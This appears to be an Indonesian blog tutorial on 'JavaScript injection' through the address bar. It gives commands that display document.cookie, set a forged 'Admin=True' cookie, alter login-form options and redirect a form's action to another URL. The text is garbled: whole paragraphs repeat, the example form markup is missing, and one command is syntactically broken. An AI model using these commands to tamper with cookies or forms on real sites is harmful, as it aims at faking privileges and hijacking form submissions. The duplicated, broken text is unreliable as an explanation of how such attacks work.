Javascript injection adalah suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).
2 perintah yang biasa digunakan untuk Javascript injection adalah alert() dan void(). Contoh, untuk membuat pop-up window, masukkan kode ini ke URL situs:
javascript:alert(‘hello world’);
Tentu, kita bisa masukkan lebih dari 1 perintah di 1 baris. Selain itu, kita bisa menggunakan perintah alert() untuk memunculkan cookie ataupun variabel apapun yang dipakai di situs itu. Contoh:
javascript:alert(document.cookie); alert(variabel);
Hmm, tapi perintah-perintah tersebut hanyalah memunculkan suatu informasi tentang situs tersebut. Bagaimana kalau kita ingin menggantinya? perintah void() akan digunakan untuk ini. Contoh:
javascript:void(variabel=new value);
Struktur perintah untuk mengganti sebuah elemen dari suatu cookie juga hampir sama.
javascript:void(document.cookie=”Field = myValue”);
Perintah ini bisa digunakan untuk membuat Field baru ataupun untuk mengganti sebuah Field sudah ada. Contoh, kalau kita ingin mengganti administration field,
javascript:void(document.cookie=”Admin=True”);
Diatas itu, perintah void() tidak hanya berlaku untuk sebuah elemen saja, kita bisa juga mengganti sebuah form. Misal, kita mempunyai kode seperti:
1.
javascript:void(document.cookie=”Field = myValue”);
Perintah ini bisa digunakan untuk membuat Field baru ataupun untuk mengganti sebuah Field sudah ada. Contoh, kalau kita ingin mengganti administration field,
javascript:void(document.cookie=”Admin=True”);
Diatas itu, perintah void() tidak hanya berlaku untuk sebuah elemen saja, kita bisa juga mengganti sebuah form. Misal, kita mempunyai kode seperti:
1.
Dan kita masukkan kode yang berikut
javascript:void(document.forms[0].elements[1].options[1].value=”Aku”);
Maka, yang dilakukannya adalah mengganti form yang pertama (/login.php), elemen yang kedua (select name=”loginID” ) dan pilihan yang kedua (option value=”Dia”)
Dia menjadi “Aku”. Tentu, jumlah perintah yang bisa kita lakukan dengan javascript injection jauh lebih banyak seperti javascript:document.forms[0].DocTitle.value=’ http://www.websiteApaSaja.com’; atau javascript:void(document.forms[0].action=”http://www.google.com”; dan seterusnya.
Dia menjadi “Aku”. Tentu, jumlah perintah yang bisa kita lakukan dengan javascript injection jauh lebih banyak seperti javascript:document.forms[0].DocTitle.value=’ http://www.websiteApaSaja.com’; atau javascript:void(document.forms[0].action=”http://www.google.com”; dan seterusnya.
0 komentar:
Posting Komentar
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.